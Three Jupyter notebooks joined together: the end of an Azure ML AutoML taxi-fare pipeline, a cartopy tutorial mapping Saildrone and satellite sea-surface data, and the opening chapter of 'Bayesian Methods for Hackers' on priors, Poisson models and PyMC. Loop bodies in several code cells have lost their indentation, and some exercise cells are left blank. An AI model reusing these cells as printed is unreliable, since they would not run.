from azureml.train.automl.run import AutoMLRun
#from azureml.widgets import RunDetails
# workaround to get the automl run as its the last step in the pipeline
# and get_steps() returns the steps from latest to first
for step in pipeline_run.get_steps():
automl_step_run_id = step.id
print(step.name)
print(automl_step_run_id)
break
automl_run = AutoMLRun(experiment = experiment, run_id=automl_step_run_id)
#RunDetails(automl_run).show()
```
### Retreive the best model
Uncomment the below cell to retrieve the best model
```
# best_run, fitted_model = automl_run.get_output()
# print(best_run)
# print(fitted_model)
```
### Test the model
#### Get test data
Uncomment the below cell to get test data
```
# split_step = pipeline_run.find_step_run(testTrainSplitStep.name)[0]
# x_test = fetch_df(split_step, output_split_test.name)[['distance','passengers', 'vendor','pickup_weekday','pickup_hour']]
# y_test = fetch_df(split_step, output_split_test.name)[['cost']]
# display(x_test.head(5))
# display(y_test.head(5))
```
#### Test the best fitted model
Uncomment the below cell to test the best fitted model
```
# y_predict = fitted_model.predict(x_test)
# y_actual = y_test.values.tolist()
# display(pd.DataFrame({'Actual':y_actual, 'Predicted':y_predict}).head(5))
# import matplotlib.pyplot as plt
# fig = plt.figure(figsize=(14, 10))
# ax1 = fig.add_subplot(111)
# distance_vals = [x[0] for x in x_test.values]
# ax1.scatter(distance_vals[:100], y_predict[:100], s=18, c='b', marker="s", label='Predicted')
# ax1.scatter(distance_vals[:100], y_actual[:100], s=18, c='r', marker="o", label='Actual')
# ax1.set_xlabel('distance (mi)')
# ax1.set_title('Predicted and Actual Cost/Distance')
# ax1.set_ylabel('Cost ($)')
# plt.legend(loc='upper left', prop={'size': 12})
# plt.rcParams.update({'font.size': 14})
# plt.show()
```
| github_jupyter |
# Plotting with [cartopy](https://scitools.org.uk/cartopy/docs/latest/)
From Cartopy website:
* Cartopy is a Python package designed for geospatial data processing in order to produce maps and other geospatial data analyses.
* Cartopy makes use of the powerful PROJ.4, NumPy and Shapely libraries and includes a programmatic interface built on top of Matplotlib for the creation of publication quality maps.
* Key features of cartopy are its object oriented projection definitions, and its ability to transform points, lines, vectors, polygons and images between those projections.
* You will find cartopy especially useful for large area / small scale data, where Cartesian assumptions of spherical data traditionally break down. If you’ve ever experienced a singularity at the pole or a cut-off at the dateline, it is likely you will appreciate cartopy’s unique features!
```
import numpy as np
import matplotlib.pyplot as plt
import xarray as xr
import cartopy.crs as ccrs
```
# Read in data using xarray
- Read in the Saildrone USV file either from a local disc `xr.open_dataset(file)`
- change latitude and longitude to lat and lon `.rename({'longitude':'lon','latitude':'lat'})`
```
file = '../data/saildrone-gen_5-antarctica_circumnavigation_2019-sd1020-20190119T040000-20190803T043000-1440_minutes-v1.1564857794963.nc'
ds_usv =
```
# Open the dataset, mask land, plot result
* `ds_sst = xr.open_dataset(url)`
* use `ds_sst = ds_sst.where(ds_sst.mask==1)` to mask values equal to 1
```
#If you are offline use the first url
#url = '../data/20111101120000-CMC-L4_GHRSST-SSTfnd-CMC0.2deg-GLOB-v02.0-fv02.0.nc'
url = 'https://podaac-opendap.jpl.nasa.gov/opendap/allData/ghrsst/data/GDS2/L4/GLOB/CMC/CMC0.2deg/v2/2011/305/20111101120000-CMC-L4_GHRSST-SSTfnd-CMC0.2deg-GLOB-v02.0-fv02.0.nc'
```
## explore the in situ data and quickly plot using cartopy
* first set up the axis with the projection you want: https://scitools.org.uk/cartopy/docs/latest/crs/projections.html
* plot to that axis and tell the projection that your data is in
#### Run the cell below and see what the image looks like. Then try adding in the lines below, one at a time, and re-run cell to see what happens
* set a background image `ax.stock_img()`
* draw coastlines `ax.coastlines(resolution='50m')`
* add a colorbary and label it `cax = plt.colorbar(cs1)` `cax.set_label('SST (K)')`
```
#for polar data, plot temperature
datamin = 0
datamax = 12
ax = plt.axes(projection=ccrs.SouthPolarStereo()) #here is where you set your axis projection
(ds_sst.analysed_sst-273.15).plot(ax=ax,
transform=ccrs.PlateCarree(), #set data projection
vmin=datamin, #data min
vmax=datamax) #data min
cs1 = ax.scatter(ds_usv.lon, ds_usv.lat,
transform=ccrs.PlateCarree(), #set data projection
s=10.0, #size for scatter point
c=ds_usv.TEMP_CTD_MEAN, #make the color of the scatter point equal to the USV temperature
edgecolor='none', #no edgecolor
cmap='jet', #colormap
vmin=datamin, #data min
vmax=datamax) #data max
ax.set_extent([-180, 180, -90, -45], crs=ccrs.PlateCarree()) #data projection
```
# Plot the salinity
* Take the code from above but use `c=ds_usv.SAL_MEAN`
* Run the code, what looks wrong?
* Change `datamin` and `datamax`
```
```
# Let's plot some data off California
* Read in data from a cruise along the California / Baja Coast
* `ds_usv = xr.open_dataset(url).rename({'longitude':'lon','latitude':'lat'})`
```
#use the first URL if you are offline
#url = '../data/saildrone-gen_4-baja_2018-sd1002-20180411T180000-20180611T055959-1_minutes-v1.nc'
url = 'https://podaac-opendap.jpl.nasa.gov/opendap/hyrax/allData/insitu/L2/saildrone/Baja/saildrone-gen_4-baja_2018-sd1002-20180411T180000-20180611T055959-1_minutes-v1.nc'
```
* Plot the data using the code from above, but change the projection
`ax = plt.axes(projection=ccrs.PlateCarree())`
```
```
* Zoom into the region of the cruise
* First calculate the lat/lon box<br>
`lonmin,lonmax = ds_usv.lon.min().data-2,ds_usv.lon.max().data+2`<br>
`latmin,latmax = ds_usv.lat.min().data-2,ds_usv.lat.max().data+2`
* Then, after plotting the data, change the extent
`ax.set_extent([lonmin,lonmax,latmin,latmax], crs=ccrs.PlateCarree())`
| github_jupyter |
Probabilistic Programming and Bayesian Methods for Hackers
========
Welcome to *Bayesian Methods for Hackers*. The full Github repository is available at [github/Probabilistic-Programming-and-Bayesian-Methods-for-Hackers](https://github.com/CamDavidsonPilon/Probabilistic-Programming-and-Bayesian-Methods-for-Hackers). The other chapters can be found on the project's [homepage](https://camdavidsonpilon.github.io/Probabilistic-Programming-and-Bayesian-Methods-for-Hackers/). We hope you enjoy the book, and we encourage any contributions!
#### Looking for a printed version of Bayesian Methods for Hackers?
_Bayesian Methods for Hackers_ is now a published book by Addison-Wesley, available on [Amazon](http://www.amazon.com/Bayesian-Methods-Hackers-Probabilistic-Addison-Wesley/dp/0133902838)!

Chapter 1
======
***
The Philosophy of Bayesian Inference
------
> You are a skilled programmer, but bugs still slip into your code. After a particularly difficult implementation of an algorithm, you decide to test your code on a trivial example. It passes. You test the code on a harder problem. It passes once again. And it passes the next, *even more difficult*, test too! You are starting to believe that there may be no bugs in this code...
If you think this way, then congratulations, you already are thinking Bayesian! Bayesian inference is simply updating your beliefs after considering new evidence. A Bayesian can rarely be certain about a result, but he or she can be very confident. Just like in the example above, we can never be 100% sure that our code is bug-free unless we test it on every possible problem; something rarely possible in practice. Instead, we can test it on a large number of problems, and if it succeeds we can feel more *confident* about our code, but still not certain. Bayesian inference works identically: we update our beliefs about an outcome; rarely can we be absolutely sure unless we rule out all other alternatives.
### The Bayesian state of mind
Bayesian inference differs from more traditional statistical inference by preserving *uncertainty*. At first, this sounds like a bad statistical technique. Isn't statistics all about deriving *certainty* from randomness? To reconcile this, we need to start thinking like Bayesians.
The Bayesian world-view interprets probability as measure of *believability in an event*, that is, how confident we are in an event occurring. In fact, we will see in a moment that this is the natural interpretation of probability.
For this to be clearer, we consider an alternative interpretation of probability: *Frequentist*, known as the more *classical* version of statistics, assumes that probability is the long-run frequency of events (hence the bestowed title). For example, the *probability of plane accidents* under a frequentist philosophy is interpreted as the *long-term frequency of plane accidents*. This makes logical sense for many probabilities of events, but becomes more difficult to understand when events have no long-term frequency of occurrences. Consider: we often assign probabilities to outcomes of presidential elections, but the election itself only happens once! Frequentists get around this by invoking alternative realities and saying across all these realities, the frequency of occurrences defines the probability.
Bayesians, on the other hand, have a more intuitive approach. Bayesians interpret a probability as measure of *belief*, or confidence, of an event occurring. Simply, a probability is a summary of an opinion. An individual who assigns a belief of 0 to an event has no confidence that the event will occur; conversely, assigning a belief of 1 implies that the individual is absolutely certain of an event occurring. Beliefs between 0 and 1 allow for weightings of other outcomes. This definition agrees with the probability of a plane accident example, for having observed the frequency of plane accidents, an individual's belief should be equal to that frequency, excluding any outside information. Similarly, under this definition of probability being equal to beliefs, it is meaningful to speak about probabilities (beliefs) of presidential election outcomes: how confident are you candidate *A* will win?
Notice in the paragraph above, I assigned the belief (probability) measure to an *individual*, not to Nature. This is very interesting, as this definition leaves room for conflicting beliefs between individuals. Again, this is appropriate for what naturally occurs: different individuals have different beliefs of events occurring, because they possess different *information* about the world. The existence of different beliefs does not imply that anyone is wrong. Consider the following examples demonstrating the relationship between individual beliefs and probabilities:
- I flip a coin, and we both guess the result. We would both agree, assuming the coin is fair, that the probability of Heads is 1/2. Assume, then, that I peek at the coin. Now I know for certain what the result is: I assign probability 1.0 to either Heads or Tails (whichever it is). Now what is *your* belief that the coin is Heads? My knowledge of the outcome has not changed the coin's results. Thus we assign different probabilities to the result.
- Your code either has a bug in it or not, but we do not know for certain which is true, though we have a belief about the presence or absence of a bug.
- A medical patient is exhibiting symptoms $x$, $y$ and $z$. There are a number of diseases that could be causing all of them, but only a single disease is present. A doctor has beliefs about which disease, but a second doctor may have slightly different beliefs.
This philosophy of treating beliefs as probability is natural to humans. We employ it constantly as we interact with the world and only see partial truths, but gather evidence to form beliefs. Alternatively, you have to be *trained* to think like a frequentist.
To align ourselves with traditional probability notation, we denote our belief about event $A$ as $P(A)$. We call this quantity the *prior probability*.
John Maynard Keynes, a great economist and thinker, said "When the facts change, I change my mind. What do you do, sir?" This quote reflects the way a Bayesian updates his or her beliefs after seeing evidence. Even — especially — if the evidence is counter to what was initially believed, the evidence cannot be ignored. We denote our updated belief as $P(A |X )$, interpreted as the probability of $A$ given the evidence $X$. We call the updated belief the *posterior probability* so as to contrast it with the prior probability. For example, consider the posterior probabilities (read: posterior beliefs) of the above examples, after observing some evidence $X$:
1\. $P(A): \;\;$ the coin has a 50 percent chance of being Heads. $P(A | X):\;\;$ You look at the coin, observe a Heads has landed, denote this information $X$, and trivially assign probability 1.0 to Heads and 0.0 to Tails.
2\. $P(A): \;\;$ This big, complex code likely has a bug in it. $P(A | X): \;\;$ The code passed all $X$ tests; there still might be a bug, but its presence is less likely now.
3\. $P(A):\;\;$ The patient could have any number of diseases. $P(A | X):\;\;$ Performing a blood test generated evidence $X$, ruling out some of the possible diseases from consideration.
It's clear that in each example we did not completely discard the prior belief after seeing new evidence $X$, but we *re-weighted the prior* to incorporate the new evidence (i.e. we put more weight, or confidence, on some beliefs versus others).
By introducing prior uncertainty about events, we are already admitting that any guess we make is potentially very wrong. After observing data, evidence, or other information, we update our beliefs, and our guess becomes *less wrong*. This is the alternative side of the prediction coin, where typically we try to be *more right*.
### Bayesian Inference in Practice
If frequentist and Bayesian inference were programming functions, with inputs being statistical problems, then the two would be different in what they return to the user. The frequentist inference function would return a number, representing an estimate (typically a summary statistic like the sample average etc.), whereas the Bayesian function would return *probabilities*.
For example, in our debugging problem above, calling the frequentist function with the argument "My code passed all $X$ tests; is my code bug-free?" would return a *YES*. On the other hand, asking our Bayesian function "Often my code has bugs. My code passed all $X$ tests; is my code bug-free?" would return something very different: probabilities of *YES* and *NO*. The function might return:
> *YES*, with probability 0.8; *NO*, with probability 0.2
This is very different from the answer the frequentist function returned. Notice that the Bayesian function accepted an additional argument: *"Often my code has bugs"*. This parameter is the *prior*. By including the prior parameter, we are telling the Bayesian function to include our belief about the situation. Technically this parameter in the Bayesian function is optional, but we will see excluding it has its own consequences.
#### Incorporating evidence
As we acquire more and more instances of evidence, our prior belief is *washed out* by the new evidence. This is to be expected. For example, if your prior belief is something ridiculous, like "I expect the sun to explode today", and each day you are proved wrong, you would hope that any inference would correct you, or at least align your beliefs better. Bayesian inference will correct this belief.
Denote $N$ as the number of instances of evidence we possess. As we gather an *infinite* amount of evidence, say as $N \rightarrow \infty$, our Bayesian results (often) align with frequentist results. Hence for large $N$, statistical inference is more or less objective. On the other hand, for small $N$, inference is much more *unstable*: frequentist estimates have more variance and larger confidence intervals. This is where Bayesian analysis excels. By introducing a prior, and returning probabilities (instead of a scalar estimate), we *preserve the uncertainty* that reflects the instability of statistical inference of a small $N$ dataset.
One may think that for large $N$, one can be indifferent between the two techniques since they offer similar inference, and might lean towards the computationally-simpler, frequentist methods. An individual in this position should consider the following quote by Andrew Gelman (2005)[1], before making such a decision:
> Sample sizes are never large. If $N$ is too small to get a sufficiently-precise estimate, you need to get more data (or make more assumptions). But once $N$ is "large enough," you can start subdividing the data to learn more (for example, in a public opinion poll, once you have a good estimate for the entire country, you can estimate among men and women, northerners and southerners, different age groups, etc.). $N$ is never enough because if it were "enough" you'd already be on to the next problem for which you need more data.
### Are frequentist methods incorrect then?
**No.**
Frequentist methods are still useful or state-of-the-art in many areas. Tools such as least squares linear regression, LASSO regression, and expectation-maximization algorithms are all powerful and fast. Bayesian methods complement these techniques by solving problems that these approaches cannot, or by illuminating the underlying system with more flexible modeling.
#### A note on *Big Data*
Paradoxically, big data's predictive analytic problems are actually solved by relatively simple algorithms [2][4]. Thus we can argue that big data's prediction difficulty does not lie in the algorithm used, but instead on the computational difficulties of storage and execution on big data. (One should also consider Gelman's quote from above and ask "Do I really have big data?" )
The much more difficult analytic problems involve *medium data* and, especially troublesome, *really small data*. Using a similar argument as Gelman's above, if big data problems are *big enough* to be readily solved, then we should be more interested in the *not-quite-big enough* datasets.
### Our Bayesian framework
We are interested in beliefs, which can be interpreted as probabilities by thinking Bayesian. We have a *prior* belief in event $A$, beliefs formed by previous information, e.g., our prior belief about bugs being in our code before performing tests.
Secondly, we observe our evidence. To continue our buggy-code example: if our code passes $X$ tests, we want to update our belief to incorporate this. We call this new belief the *posterior* probability. Updating our belief is done via the following equation, known as Bayes' Theorem, after its discoverer Thomas Bayes:
\begin{align}
P( A | X ) = & \frac{ P(X | A) P(A) } {P(X) } \\\\[5pt]
& \propto P(X | A) P(A)\;\; (\propto \text{is proportional to } )
\end{align}
The above formula is not unique to Bayesian inference: it is a mathematical fact with uses outside Bayesian inference. Bayesian inference merely uses it to connect prior probabilities $P(A)$ with an updated posterior probabilities $P(A | X )$.
##### Example: Mandatory coin-flip example
Every statistics text must contain a coin-flipping example, I'll use it here to get it out of the way. Suppose, naively, that you are unsure about the probability of heads in a coin flip (spoiler alert: it's 50%). You believe there is some true underlying ratio, call it $p$, but have no prior opinion on what $p$ might be.
We begin to flip a coin, and record the observations: either $H$ or $T$. This is our observed data. An interesting question to ask is how our inference changes as we observe more and more data? More specifically, what do our posterior probabilities look like when we have little data, versus when we have lots of data.
Below we plot a sequence of updating posterior probabilities as we observe increasing amounts of data (coin flips).
```
"""
The book uses a custom matplotlibrc file, which provides the unique styles for
matplotlib plots. If executing this book, and you wish to use the book's
styling, provided are two options:
1. Overwrite your own matplotlibrc file with the rc-file provided in the
book's styles/ dir. See http://matplotlib.org/users/customizing.html
2. Also in the styles is bmh_matplotlibrc.json file. This can be used to
update the styles in only this notebook. Try running the following code:
import json, matplotlib
s = json.load( open("../styles/bmh_matplotlibrc.json") )
matplotlib.rcParams.update(s)
"""
# The code below can be passed over, as it is currently not important, plus it
# uses advanced topics we have not covered yet. LOOK AT PICTURE, MICHAEL!
%matplotlib inline
from IPython.core.pylabtools import figsize
import numpy as np
from matplotlib import pyplot as plt
figsize(11, 9)
import scipy.stats as stats
dist = stats.beta
n_trials = [0, 1, 2, 3, 4, 5, 8, 15, 50, 500]
data = stats.bernoulli.rvs(0.5, size=n_trials[-1])
x = np.linspace(0, 1, 100)
# For the already prepared, I'm using Binomial's conj. prior.
for k, N in enumerate(n_trials):
sx = plt.subplot(len(n_trials) / 2, 2, k + 1)
plt.xlabel("$p$, probability of heads") \
if k in [0, len(n_trials) - 1] else None
plt.setp(sx.get_yticklabels(), visible=False)
heads = data[:N].sum()
y = dist.pdf(x, 1 + heads, 1 + N - heads)
plt.plot(x, y, label="observe %d tosses,\n %d heads" % (N, heads))
plt.fill_between(x, 0, y, color="#348ABD", alpha=0.4)
plt.vlines(0.5, 0, 4, color="k", linestyles="--", lw=1)
leg = plt.legend()
leg.get_frame().set_alpha(0.4)
plt.autoscale(tight=True)
plt.suptitle("Bayesian updating of posterior probabilities",
y=1.02,
fontsize=14)
plt.tight_layout()
```
The posterior probabilities are represented by the curves, and our uncertainty is proportional to the width of the curve. As the plot above shows, as we start to observe data our posterior probabilities start to shift and move around. Eventually, as we observe more and more data (coin-flips), our probabilities will tighten closer and closer around the true value of $p=0.5$ (marked by a dashed line).
Notice that the plots are not always *peaked* at 0.5. There is no reason it should be: recall we assumed we did not have a prior opinion of what $p$ is. In fact, if we observe quite extreme data, say 8 flips and only 1 observed heads, our distribution would look very biased *away* from lumping around 0.5 (with no prior opinion, how confident would you feel betting on a fair coin after observing 8 tails and 1 head). As more data accumulates, we would see more and more probability being assigned at $p=0.5$, though never all of it.
The next example is a simple demonstration of the mathematics of Bayesian inference.
##### Example: Bug, or just sweet, unintended feature?
Let $A$ denote the event that our code has **no bugs** in it. Let $X$ denote the event that the code passes all debugging tests. For now, we will leave the prior probability of no bugs as a variable, i.e. $P(A) = p$.
We are interested in $P(A|X)$, i.e. the probability of no bugs, given our debugging tests $X$. To use the formula above, we need to compute some quantities.
What is $P(X | A)$, i.e., the probability that the code passes $X$ tests *given* there are no bugs? Well, it is equal to 1, for a code with no bugs will pass all tests.
$P(X)$ is a little bit trickier: The event $X$ can be divided into two possibilities, event $X$ occurring even though our code *indeed has* bugs (denoted $\sim A\;$, spoken *not $A$*), or event $X$ without bugs ($A$). $P(X)$ can be represented as:
\begin{align}
P(X ) & = P(X \text{ and } A) + P(X \text{ and } \sim A) \\\\[5pt]
& = P(X|A)P(A) + P(X | \sim A)P(\sim A)\\\\[5pt]
& = P(X|A)p + P(X | \sim A)(1-p)
\end{align}
We have already computed $P(X|A)$ above. On the other hand, $P(X | \sim A)$ is subjective: our code can pass tests but still have a bug in it, though the probability there is a bug present is reduced. Note this is dependent on the number of tests performed, the degree of complication in the tests, etc. Let's be conservative and assign $P(X|\sim A) = 0.5$. Then
\begin{align}
P(A | X) & = \frac{1\cdot p}{ 1\cdot p +0.5 (1-p) } \\\\
& = \frac{ 2 p}{1+p}
\end{align}
This is the posterior probability. What does it look like as a function of our prior, $p \in [0,1]$?
```
figsize(12.5, 4)
p = np.linspace(0, 1, 50)
plt.plot(p, 2 * p / (1 + p), color="#348ABD", lw=3)
# plt.fill_between(p, 2*p/(1+p), alpha=.5, facecolor=["#A60628"])
plt.scatter(0.2, 2 * (0.2) / 1.2, s=140, c="#348ABD")
plt.xlim(0, 1)
plt.ylim(0, 1)
plt.xlabel("Prior, $P(A) = p$")
plt.ylabel("Posterior, $P(A|X)$, with $P(A) = p$")
plt.title("Is my code bug-free?")
```
We can see the biggest gains if we observe the $X$ tests passed when the prior probability, $p$, is low. Let's settle on a specific value for the prior. I'm a strong programmer (I think), so I'm going to give myself a realistic prior of 0.20, that is, there is a 20% chance that I write code bug-free. To be more realistic, this prior should be a function of how complicated and large the code is, but let's pin it at 0.20. Then my updated belief that my code is bug-free is 0.33.
Recall that the prior is a probability: $p$ is the prior probability that there *are no bugs*, so $1-p$ is the prior probability that there *are bugs*.
Similarly, our posterior is also a probability, with $P(A | X)$ the probability there is no bug *given we saw all tests pass*, hence $1-P(A|X)$ is the probability there is a bug *given all tests passed*. What does our posterior probability look like? Below is a chart of both the prior and the posterior probabilities.
```
figsize(12.5, 4)
colours = ["#348ABD", "#A60628"]
prior = [0.20, 0.80]
posterior = [1. / 3, 2. / 3]
plt.bar([0, .7], prior, alpha=0.70, width=0.25,
color=colours[0], label="prior distribution",
lw="3", edgecolor=colours[0])
plt.bar([0 + 0.25, .7 + 0.25], posterior, alpha=0.7,
width=0.25, color=colours[1],
label="posterior distribution",
lw="3", edgecolor=colours[1])
plt.ylim(0,1)
plt.xticks([0.20, .95], ["Bugs Absent", "Bugs Present"])
plt.title("Prior and Posterior probability of bugs present")
plt.ylabel("Probability")
plt.legend(loc="upper left");
```
Notice that after we observed $X$ occur, the probability of bugs being absent increased. By increasing the number of tests, we can approach confidence (probability 1) that there are no bugs present.
This was a very simple example of Bayesian inference and Bayes rule. Unfortunately, the mathematics necessary to perform more complicated Bayesian inference only becomes more difficult, except for artificially constructed cases. We will later see that this type of mathematical analysis is actually unnecessary. First we must broaden our modeling tools. The next section deals with *probability distributions*. If you are already familiar, feel free to skip (or at least skim), but for the less familiar the next section is essential.
_______
## Probability Distributions
**Let's quickly recall what a probability distribution is:** Let $Z$ be some random variable. Then associated with $Z$ is a *probability distribution function* that assigns probabilities to the different outcomes $Z$ can take. Graphically, a probability distribution is a curve where the probability of an outcome is proportional to the height of the curve. You can see examples in the first figure of this chapter.
We can divide random variables into three classifications:
- **$Z$ is discrete**: Discrete random variables may only assume values on a specified list. Things like populations, movie ratings, and number of votes are all discrete random variables. Discrete random variables become more clear when we contrast them with...
- **$Z$ is continuous**: Continuous random variable can take on arbitrarily exact values. For example, temperature, speed, time, color are all modeled as continuous variables because you can progressively make the values more and more precise.
- **$Z$ is mixed**: Mixed random variables assign probabilities to both discrete and continuous random variables, i.e. it is a combination of the above two categories.
#### Expected Value
Expected value (EV) is one of the most important concepts in probability. The EV for a given probability distribution can be described as "the mean value in the long run for many repeated samples from that distribution." To borrow a metaphor from physics, a distribution's EV as like its "center of mass." Imagine repeating the same experiment many times over, and taking the average over each outcome. The more you repeat the experiment, the closer this average will become to the distributions EV. (side note: as the number of repeated experiments goes to infinity, the difference between the average outcome and the EV becomes arbitrarily small.)
### Discrete Case
If $Z$ is discrete, then its distribution is called a *probability mass function*, which measures the probability $Z$ takes on the value $k$, denoted $P(Z=k)$. Note that the probability mass function completely describes the random variable $Z$, that is, if we know the mass function, we know how $Z$ should behave. There are popular probability mass functions that consistently appear: we will introduce them as needed, but let's introduce the first very useful probability mass function. We say $Z$ is *Poisson*-distributed if:
$$P(Z = k) =\frac{ \lambda^k e^{-\lambda} }{k!}, \; \; k=0,1,2, \dots, \; \; \lambda \in \mathbb{R}_{>0} $$
$\lambda$ is called a parameter of the distribution, and it controls the distribution's shape. For the Poisson distribution, $\lambda$ can be any positive number. By increasing $\lambda$, we add more probability to larger values, and conversely by decreasing $\lambda$ we add more probability to smaller values. One can describe $\lambda$ as the *intensity* of the Poisson distribution.
Unlike $\lambda$, which can be any positive number, the value $k$ in the above formula must be a non-negative integer, i.e., $k$ must take on values 0,1,2, and so on. This is very important, because if you wanted to model a population you could not make sense of populations with 4.25 or 5.612 members.
If a random variable $Z$ has a Poisson mass distribution, we denote this by writing
$$Z \sim \text{Poi}(\lambda) $$
One useful property of the Poisson distribution is that its expected value is equal to its parameter, i.e.:
$$E\large[ \;Z\; | \; \lambda \;\large] = \lambda $$
We will use this property often, so it's useful to remember. Below, we plot the probability mass distribution for different $\lambda$ values. The first thing to notice is that by increasing $\lambda$, we add more probability of larger values occurring. Second, notice that although the graph ends at 15, the distributions do not. They assign positive probability to every non-negative integer.
```
figsize(12.5, 4)
import scipy.stats as stats
a = np.arange(16)
poi = stats.poisson
lambda_ = [1.5, 4.25]
colours = ["#348ABD", "#A60628"]
plt.bar(a, poi.pmf(a, lambda_[0]), color=colours[0],
label="$\lambda = %.1f$" % lambda_[0], alpha=0.60,
edgecolor=colours[0], lw="3")
plt.bar(a, poi.pmf(a, lambda_[1]), color=colours[1],
label="$\lambda = %.1f$" % lambda_[1], alpha=0.60,
edgecolor=colours[1], lw="3")
plt.xticks(a + 0.4, a)
plt.legend()
plt.ylabel("probability of $k$")
plt.xlabel("$k$")
plt.title("Probability mass function of a Poisson random variable; differing \
$\lambda$ values")
```
### Continuous Case
Instead of a probability mass function, a continuous random variable has a *probability density function*. This might seem like unnecessary nomenclature, but the density function and the mass function are very different creatures. An example of continuous random variable is a random variable with *exponential density*. The density function for an exponential random variable looks like this:
$$f_Z(z | \lambda) = \lambda e^{-\lambda z }, \;\; z\ge 0$$
Like a Poisson random variable, an exponential random variable can take on only non-negative values. But unlike a Poisson variable, the exponential can take on *any* non-negative values, including non-integral values such as 4.25 or 5.612401. This property makes it a poor choice for count data, which must be an integer, but a great choice for time data, temperature data (measured in Kelvins, of course), or any other precise *and positive* variable. The graph below shows two probability density functions with different $\lambda$ values.
When a random variable $Z$ has an exponential distribution with parameter $\lambda$, we say *$Z$ is exponential* and write
$$Z \sim \text{Exp}(\lambda)$$
Given a specific $\lambda$, the expected value of an exponential random variable is equal to the inverse of $\lambda$, that is:
$$E[\; Z \;|\; \lambda \;] = \frac{1}{\lambda}$$
```
a = np.linspace(0, 4, 100)
expo = stats.expon
lambda_ = [0.5, 1]
for l, c in zip(lambda_, colours):
plt.plot(a, expo.pdf(a, scale=1. / l), lw=3,
color=c, label="$\lambda = %.1f$" % l)
plt.fill_between(a, expo.pdf(a, scale=1. / l), color=c, alpha=.33)
plt.legend()
plt.ylabel("PDF at $z$")
plt.xlabel("$z$")
plt.ylim(0, 1.2)
plt.title("Probability density function of an Exponential random variable;\
differing $\lambda$");
```
### But what is $\lambda \;$?
**This question is what motivates statistics**. In the real world, $\lambda$ is hidden from us. We see only $Z$, and must go backwards to try and determine $\lambda$. The problem is difficult because there is no one-to-one mapping from $Z$ to $\lambda$. Many different methods have been created to solve the problem of estimating $\lambda$, but since $\lambda$ is never actually observed, no one can say for certain which method is best!
Bayesian inference is concerned with *beliefs* about what $\lambda$ might be. Rather than try to guess $\lambda$ exactly, we can only talk about what $\lambda$ is likely to be by assigning a probability distribution to $\lambda$.
This might seem odd at first. After all, $\lambda$ is fixed; it is not (necessarily) random! How can we assign probabilities to values of a non-random variable? Ah, we have fallen for our old, frequentist way of thinking. Recall that under Bayesian philosophy, we *can* assign probabilities if we interpret them as beliefs. And it is entirely acceptable to have *beliefs* about the parameter $\lambda$.
##### Example: Inferring behaviour from text-message data
Let's try to model a more interesting example, one that concerns the rate at which a user sends and receives text messages:
> You are given a series of daily text-message counts from a user of your system. The data, plotted over time, appears in the chart below. You are curious to know if the user's text-messaging habits have changed over time, either gradually or suddenly. How can you model this? (This is in fact my own text-message data. Judge my popularity as you wish.)
```
figsize(12.5, 3.5)
count_data = np.loadtxt("data/txtdata.csv")
n_count_data = len(count_data)
plt.bar(np.arange(n_count_data), count_data, color="#348ABD")
plt.xlabel("Time (days)")
plt.ylabel("count of text-msgs received")
plt.title("Did the user's texting habits change over time?")
plt.xlim(0, n_count_data);
```
Before we start modeling, see what you can figure out just by looking at the chart above. Would you say there was a change in behaviour during this time period?
How can we start to model this? Well, as we have conveniently already seen, a Poisson random variable is a very appropriate model for this type of *count* data. Denoting day $i$'s text-message count by $C_i$,
$$ C_i \sim \text{Poisson}(\lambda) $$
We are not sure what the value of the $\lambda$ parameter really is, however. Looking at the chart above, it appears that the rate might become higher late in the observation period, which is equivalent to saying that $\lambda$ increases at some point during the observations. (Recall that a higher value of $\lambda$ assigns more probability to larger outcomes. That is, there is a higher probability of many text messages having been sent on a given day.)
How can we represent this observation mathematically? Let's assume that on some day during the observation period (call it $\tau$), the parameter $\lambda$ suddenly jumps to a higher value. So we really have two $\lambda$ parameters: one for the period before $\tau$, and one for the rest of the observation period. In the literature, a sudden transition like this would be called a *switchpoint*:
$$
\lambda =
\begin{cases}
\lambda_1 & \text{if } t \lt \tau \cr
\lambda_2 & \text{if } t \ge \tau
\end{cases}
$$
If, in reality, no sudden change occurred and indeed $\lambda_1 = \lambda_2$, then the $\lambda$s posterior distributions should look about equal.
We are interested in inferring the unknown $\lambda$s. To use Bayesian inference, we need to assign prior probabilities to the different possible values of $\lambda$. What would be good prior probability distributions for $\lambda_1$ and $\lambda_2$? Recall that $\lambda$ can be any positive number. As we saw earlier, the *exponential* distribution provides a continuous density function for positive numbers, so it might be a good choice for modeling $\lambda_i$. But recall that the exponential distribution takes a parameter of its own, so we'll need to include that parameter in our model. Let's call that parameter $\alpha$.
\begin{align}
&\lambda_1 \sim \text{Exp}( \alpha ) \\\
&\lambda_2 \sim \text{Exp}( \alpha )
\end{align}
$\alpha$ is called a *hyper-parameter* or *parent variable*. In literal terms, it is a parameter that influences other parameters. Our initial guess at $\alpha$ does not influence the model too strongly, so we have some flexibility in our choice. A good rule of thumb is to set the exponential parameter equal to the inverse of the average of the count data. Since we're modeling $\lambda$ using an exponential distribution, we can use the expected value identity shown earlier to get:
$$\frac{1}{N}\sum_{i=0}^N \;C_i \approx E[\; \lambda \; |\; \alpha ] = \frac{1}{\alpha}$$
An alternative, and something I encourage the reader to try, would be to have two priors: one for each $\lambda_i$. Creating two exponential distributions with different $\alpha$ values reflects our prior belief that the rate changed at some point during the observations.
What about $\tau$? Because of the noisiness of the data, it's difficult to pick out a priori when $\tau$ might have occurred. Instead, we can assign a *uniform prior belief* to every possible day. This is equivalent to saying
\begin{align}
& \tau \sim \text{DiscreteUniform(1,70) }\\\\
& \Rightarrow P( \tau = k ) = \frac{1}{70}
\end{align}
So after all this, what does our overall prior distribution for the unknown variables look like? Frankly, *it doesn't matter*. What we should understand is that it's an ugly, complicated mess involving symbols only a mathematician could love. And things will only get uglier the more complicated our models become. Regardless, all we really care about is the posterior distribution.
We next turn to PyMC, a Python library for performing Bayesian analysis that is undaunted by the mathematical monster we have created.
Introducing our first hammer: PyMC
-----
PyMC is a Python library for programming Bayesian analysis [3]. It is a fast, well-maintained library. The only unfortunate part is that its documentation is lacking in certain areas, especially those that bridge the gap between beginner and hacker. One of this book's main goals is to solve that problem, and also to demonstrate why PyMC is so cool.
We will model the problem above using PyMC. This type of programming is called *probabilistic programming*, an unfortunate misnomer that invokes ideas of randomly-generated code and has likely confused and frightened users away from this field. The code is not random; it is probabilistic in the sense that we create probability models using programming variables as the model's components. Model components are first-class primitives within the PyMC framework.
B. Cronin [5] has a very motivating description of probabilistic programming:
